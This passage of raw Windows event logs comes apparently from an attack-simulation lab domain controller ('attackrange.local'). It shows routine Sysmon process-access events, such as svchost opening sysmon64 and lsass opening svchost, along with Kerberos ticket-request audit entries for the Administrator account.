06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4769,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4770,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.880\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-00106B8A0600}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.880","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-00106B8A0600}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4771,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.442\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.442","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220467,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220468,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{956FED91-BC05-21D4-656B-8DEC1409A64A}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket 